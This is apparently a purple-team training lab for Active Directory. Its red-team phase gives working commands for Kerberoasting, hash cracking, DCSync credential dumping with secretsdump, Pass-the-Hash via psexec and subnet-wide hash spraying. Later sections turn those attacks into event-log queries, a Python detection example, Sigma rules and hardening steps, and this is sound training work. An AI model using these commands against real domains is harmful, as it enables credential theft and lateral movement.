LAB L12 · ACTIVE DIRECTORY · ADVANCED

Active Directory Attack & AI Defense

Build an AD lab, enumerate it with BloodHound, execute Kerberoasting and Pass-the-Hash attacks, then turn the Windows Event Log evidence into Sigma detection rules for your SIEM with the AI Analyst as blue team partner.

120 min
🖥️ Kali + Windows Server VM
🔧 Impacket · BloodHound · Mimikatz · Sigma
🤖 AI Detection Engineering
🎯 Red/Blue Team Exercise

You're doing a purple team exercise: first play attacker and compromise the AD environment using industry-standard techniques, then switch to defender and build detection rules for everything you just did. The AI Analyst acts as your blue team partner — analyzing attack evidence and writing detection logic.

Phase 0 — Build the AD Lab
Set up Windows Server with Active Directory (or use an existing AD VM)
Install Windows Server and promote to Domain Controller
Free 180-day eval from Microsoft Evaluation Center
Download a Windows Server 2019/2022 evaluation from microsoft.com/en-us/evalcenter. Install it as a VM on the host-only network with the static IP 192.168.56.10, rename it dc01 (Rename-Computer -NewName dc01 -Restart) so the hostnames used later in the lab match, then promote it to a DC:
# In Windows Server PowerShell (as Administrator):
Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
Install-ADDSForest -DomainName "lab.local" -InstallDns -Force   # prompts for the DSRM (Safe Mode) password, then reboots
# After the reboot, create test users and a group:
New-ADUser -Name "alice.johnson" -SamAccountName "alice.johnson" -AccountPassword (ConvertTo-SecureString "Password1!" -AsPlainText -Force) -Enabled $true
New-ADUser -Name "bob.smith" -SamAccountName "bob.smith" -AccountPassword (ConvertTo-SecureString "Summer2024!" -AsPlainText -Force) -Enabled $true
New-ADGroup -Name "IT_Admins" -GroupScope Global
Add-ADGroupMember "IT_Admins" -Members "alice.johnson"
# Phase 2 needs a Kerberoastable target: a user account with an SPN and a weak password ("Password123" is in rockyou.txt)
New-ADUser -Name "svc_sql" -SamAccountName "svc_sql" -AccountPassword (ConvertTo-SecureString "Password123" -AsPlainText -Force) -Enabled $true -ServicePrincipalNames "MSSQLSvc/dc01.lab.local:1433"
💡
Alternatively, use the free GOAD (Game of Active Directory) lab: github.com/Orange-Cyberdefense/GOAD — a fully pre-configured vulnerable AD environment via Vagrant.
Configure Kali to reach the DC and set up Impacket
Install attack tools and verify connectivity
# On Kali — both VMs on the same Host-Only network
ping -c 3 192.168.56.10   # Windows DC — should respond
# Kali packages Impacket's example scripts as impacket-* commands (impacket-GetUserSPNs, impacket-secretsdump, ...).
# Outside Kali, use `pipx install impacket` instead; the scripts are then called GetUserSPNs.py etc.
sudo apt install -y impacket-scripts bloodhound neo4j crackmapexec
# On current Kali releases crackmapexec has been replaced by its successor netexec (`sudo apt install -y netexec`, command `nxc`, same syntax)
# Point DNS at the DC: Kerberos needs to resolve the realm and the DC's hostname
echo "nameserver 192.168.56.10" | sudo tee /etc/resolv.conf
echo "192.168.56.10 lab.local dc01.lab.local" | sudo tee -a /etc/hosts
nslookup dc01.lab.local   # must resolve before Phase 2
Phase 1 — Enumeration (Red Team)
Map the domain: users, groups, trusts, and attack paths
LDAP enumeration with ldapsearch and enum4linux
Enumerate users, groups, and domain info, first anonymously and then with the low-privilege account
# Anonymous LDAP: a default DC answers only the rootDSE without a bind, so expect "Operations error" here.
# If this returns objects, anonymous binds are enabled on the DC, which is a finding in itself.
ldapsearch -x -H ldap://192.168.56.10 -b "DC=lab,DC=local" "(objectClass=user)" cn sAMAccountName | tee ldap_users.txt
# Authenticated LDAP as any domain user works against every DC
ldapsearch -x -H ldap://192.168.56.10 -D 'alice.johnson@lab.local' -w 'Password1!' -b "DC=lab,DC=local" "(&(objectCategory=person)(objectClass=user))" sAMAccountName memberOf servicePrincipalName | tee ldap_users.txt
# enum4linux relies on SMB null sessions, which Server 2019/2022 restrict by default, so give it credentials
enum4linux -a -u alice.johnson -p 'Password1!' 192.168.56.10 | tee enum4linux.txt
# CrackMapExec for quick domain info (OS version, domain name, SMB signing)
crackmapexec smb 192.168.56.10
Run BloodHound to map attack paths
BloodHound visualizes the shortest path to Domain Admin
# Collect AD data with SharpHound (run on a domain-joined Windows host) or with bloodhound-python from Kali
bloodhound-python -u alice.johnson -p 'Password1!' -d lab.local -ns 192.168.56.10 -c All
# Start Neo4j and the BloodHound GUI. On first run, open http://localhost:7474 and change the default neo4j/neo4j password
sudo neo4j start
bloodhound &
# In BloodHound UI: log in with the Neo4j credentials, upload the *.json files the collector wrote, then run:
# Pre-Built Queries → Find Shortest Paths to Domain Admins
# Pre-Built Queries → List all Kerberoastable Accounts (svc_sql should appear here; it is the Phase 2 target)
🤖 AI Analyst

Paste your BloodHound findings (attack paths, kerberoastable users, ACL misconfigurations). The AI will explain each vulnerability, rank by exploitability, and suggest remediation.

Phase 2 — Exploitation (Red Team)
Execute Kerberoasting and Pass-the-Hash attacks
Kerberoasting — steal service account hashes
Request Kerberos service tickets and crack them offline
Kerberoasting targets user accounts that have a Service Principal Name (SPN). Any authenticated domain user may request a service ticket (TGS) for any SPN, and part of that ticket is encrypted with a key derived from the service account's password (for RC4, the account's NT hash itself). The ticket can therefore be cracked offline: no failed logons, no lockout risk, and nothing on the DC beyond a normal ticket request.
# Find Kerberoastable accounts (any domain user can do this)
impacket-GetUserSPNs lab.local/alice.johnson:'Password1!' -dc-ip 192.168.56.10
# Request TGS tickets and write them to a file in hashcat format
impacket-GetUserSPNs lab.local/alice.johnson:'Password1!' -dc-ip 192.168.56.10 -request -outputfile kerberoast_hashes.txt
# Crack with hashcat: mode 13100 = Kerberos 5 TGS-REP etype 23 (RC4). AES tickets ($krb5tgs$17$ / $krb5tgs$18$) need modes 19600 / 19700
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
⚠️
Every service-ticket request is logged on the DC as Windows Event ID 4769, so Kerberoasting shows up as 4769 events with TicketEncryptionType 0x17 (RC4) for user-account SPNs, typically several within a few seconds from one client. We'll use this in the blue team phase to detect what you just did.
Pass-the-Hash lateral movement
Use NTLM hashes to authenticate without knowing the plaintext password
# Dump hashes (via Mimikatz on the host, or remotely with secretsdump). This needs administrative rights on the
# target: a plain domain user such as alice.johnson gets "access denied". Against a DC, secretsdump pulls
# NTDS over DRSUAPI (a DCSync), which is what Phase 3 will look for. You are prompted for the password.
impacket-secretsdump lab.local/Administrator@192.168.56.10
# Pass-the-Hash with the stolen NT hash. The LM half is left empty; replace hash_here with the 32-hex NT hash
impacket-psexec lab.local/Administrator@192.168.56.10 -hashes :hash_here
# Or use CrackMapExec to spray the hash across the subnet
crackmapexec smb 192.168.56.0/24 -u Administrator -H hash_here -d lab.local
Phase 3 — Detection (Blue Team + AI)
Find the attacks you just ran in Windows Event Logs and write detection rules
Query Windows Event Logs for attack evidence
Find Kerberoasting, Pass-the-Hash, and credential dumping in the Security log
On the Windows DC (PowerShell), query the Security event log. The Properties indexes below follow the field order of each event's XML (open one event in Event Viewer → Details → XML View to confirm them on your build):
# Kerberoasting: 4769 with RC4 (TicketEncryptionType 0x17, Properties[5]) for user-account SPNs (ServiceName, Properties[2]).
# Machine accounts (names ending in $) and krbtgt request RC4/legacy tickets legitimately and are filtered out.
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4769} | Where-Object { $_.Properties[5].Value -eq '0x17' -and $_.Properties[2].Value -notlike '*$' -and $_.Properties[2].Value -ne 'krbtgt' } | Select-Object TimeCreated, Message | Format-List

# Pass-the-Hash: 4624 network logon (LogonType 3, Properties[8]) authenticated with NTLM instead of Kerberos.
# AuthenticationPackageName is Properties[10]; Properties[14] is LmPackageName ('NTLM V2'), which is not what we match on.
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624} | Where-Object { $_.Properties[8].Value -eq 3 -and $_.Properties[10].Value -eq 'NTLM' } | Select-Object TimeCreated, Message | Format-List

# Credential dumping: secretsdump against a DC replicates NTDS over DRSUAPI (DCSync). That is audited as Event 4662
# carrying the DS-Replication-Get-Changes / -All control-access GUIDs (1131f6aa-... / 1131f6ad-...). Replication by
# DC computer accounts ($) is normal; anything else is not. Requires "Audit Directory Service Access" to be enabled.
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4662} | Where-Object { $_.Message -match '1131f6a[ad]-9c07-11d1-f79f-00c04fc2dcd2' -and $_.Properties[1].Value -notlike '*$' } | Select-Object TimeCreated, Message | Format-List
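The queries above answer "did it happen"; a detection rule also has to answer "is this abnormal". Here is an added Python example (mine, not from the lab page or any vendor) that applies the same field logic to a handful of constructed Security-log records and adds the false-positive reduction a Sigma rule needs: machine accounts and krbtgt are excluded, a Kerberoast alert needs several distinct user SPNs from one source inside a short window, and NTLM network logons only fire for watch-listed privileged accounts from hosts that are not on an allow list. Field names follow the 4769/4624 event XML; the threshold, the watch list and the admin-host allow list are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log records shaped like the properties Get-WinEvent exposes
# (a real pipeline would export them with Get-WinEvent | ConvertTo-Json or read them from the SIEM).
SAMPLE_EVENTS = [
    # Kerberoast burst: one client pulls RC4 tickets for three user SPNs within seconds
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:01", "TargetUserName": "alice.johnson@LAB.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.56.20"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "alice.johnson@LAB.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.56.20"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:02", "TargetUserName": "alice.johnson@LAB.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.56.20"},
    # Benign: a machine-account ticket (AES) and a single RC4 request from a host running one legacy app
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:03", "TargetUserName": "bob.smith@LAB.LOCAL",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:192.168.56.30"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:05:00", "TargetUserName": "bob.smith@LAB.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:192.168.56.30"},
    # Pass-the-Hash: NTLM network logon as Administrator from the attacker box
    {"EventID": 4624, "TimeCreated": "2024-05-01T10:10:00", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "WorkstationName": "KALI", "IpAddress": "192.168.56.20"},
    # Benign: a Kerberos network logon, and an NTLM admin logon from the allow-listed jump host
    {"EventID": 4624, "TimeCreated": "2024-05-01T10:10:05", "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "alice.johnson", "WorkstationName": "WS01", "IpAddress": "192.168.56.30"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T10:11:00", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "WorkstationName": "JUMP01", "IpAddress": "192.168.56.5"},
]


def detect_kerberoast(events, min_spns=2, window=timedelta(minutes=5)):
    """Sigma-style selection: EventID 4769, TicketEncryptionType 0x17, Status 0x0.
    Filter: ServiceName ending in '$' (machine accounts) or krbtgt.
    Then a per-source threshold: at least min_spns distinct service accounts inside `window`,
    because one RC4 ticket for one legacy service is normal and a burst across services is not."""
    per_source = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != "0x17" or e["Status"] != "0x0":
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        per_source[e["IpAddress"]].append((datetime.fromisoformat(e["TimeCreated"]), svc, e["TargetUserName"]))

    alerts = []
    for ip, requests in per_source.items():
        requests.sort()
        for i, (t0, _, requester) in enumerate(requests):
            spns = {svc for t, svc, _ in requests[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                alerts.append({"rule": "kerberoast_burst", "source": ip, "requester": requester, "spns": sorted(spns)})
                break  # one alert per source is enough
    return alerts


def detect_pass_the_hash(events, watch_accounts=("administrator",), admin_hosts=("192.168.56.5",)):
    """Sigma-style selection: EventID 4624, LogonType 3, AuthenticationPackageName NTLM.
    False-positive reduction: only privileged accounts on the watch list, and not from hosts
    where NTLM admin logons are expected (jump hosts, backup servers)."""
    alerts = []
    for e in events:
        if e["EventID"] != 4624 or e["LogonType"] != 3 or e["AuthenticationPackageName"] != "NTLM":
            continue
        if e["TargetUserName"].lower() not in watch_accounts or e["IpAddress"] in admin_hosts:
            continue
        alerts.append({"rule": "ntlm_privileged_network_logon", "user": e["TargetUserName"],
                       "source": e["IpAddress"], "workstation": e["WorkstationName"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS) + detect_pass_the_hash(SAMPLE_EVENTS):
        print(alert)
```

The selection and filter parts of each function translate directly into a Sigma rule's `selection` / `filter` / `condition: selection and not filter`; the count-per-source threshold is the part Sigma expresses with a `count() by IpAddress > N` aggregation and that some backends implement differently, so test it in the SIEM rather than assume it. When you ask the AI Analyst for rules in the next step, compare its filters against these two: a rule without the machine-account exclusion will page you on every DC replication cycle.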
🤖 AI Analyst — Blue Team Detection

Paste your Windows Event Log findings. The AI will explain what each event proves, write Sigma detection rules, and generate Splunk SPL queries to detect these attacks in production.

AI generates Sigma rules for all three attack techniques
Vendor-neutral rules deployable to any SIEM
🤖 AI Analyst — Sigma Generation

Ask the AI to write Sigma rules for: 1) Kerberoasting (Event 4769 RC4), 2) Pass-the-Hash (Event 4624 type 3 NTLM), 3) LDAP enumeration, 4) BloodHound collection. Include false positive reduction logic.

Harden the AD environment
AI recommends specific Group Policy and configuration changes
🤖 AI Analyst — AD Hardening

Describe the vulnerabilities you exploited (weak service account passwords, NTLM enabled, etc.). The AI will provide specific Group Policy settings, PowerShell commands, and architectural changes to harden the environment.

Install Sysmon for enhanced logging
Sysmon provides far more detail than standard Windows logging
# Download Sysmon from Microsoft Sysinternals
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Sysmon.zip" -OutFile Sysmon.zip
Expand-Archive Sysmon.zip -DestinationPath .\Sysmon
# Install with the SwiftOnSecurity config (widely used community ruleset)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" -OutFile sysmon-config.xml
.\Sysmon\Sysmon64.exe -accepteula -i sysmon-config.xml
# Events are written to Applications and Services Logs → Microsoft → Windows → Sysmon → Operational
Re-run attacks and verify detection
Confirm your Sigma rules and Sysmon catch the attacks
Repeat the Kerberoasting and Pass-the-Hash attacks from Kali, then check both sides. Do your Sigma rules fire in Splunk (or whichever SIEM receives the DC's Security log)? Kerberoasting never starts a process on the DC, so Sysmon will not see it: its only trace is the 4769 events. psexec does leave host evidence: expect a Sysmon Event ID 1 (process create) for the service binary it uploads to ADMIN$ and a System log Event ID 7045 (service installed), and check whether Sysmon Event ID 3 (network connection) records the inbound SMB session at all, since SMB is served by the System process and a community config may filter it.
Generate the purple team report
Document attacks, detection gaps, and recommended controls
🤖 AI Analyst

Share your attack summary and detection results. The AI will write a purple team report covering: attacks executed, detection coverage (what you detected vs missed), risk ratings, and a prioritized remediation roadmap.

Lab complete
Review key takeaways from the red/blue exercise
✅ AD environment built with users and groups
✅ BloodHound enumeration completed and attack paths mapped
✅ Kerberoasting executed and hashes cracked
✅ Pass-the-Hash lateral movement demonstrated
✅ Windows Event Logs analyzed for attack evidence
✅ Sigma rules written for all three techniques
✅ Sysmon deployed with community config
✅ Purple team report drafted

Next: Lab L13 — Memory Forensics with Volatility

Apply Volatility forensics to a realistic compromised memory image.
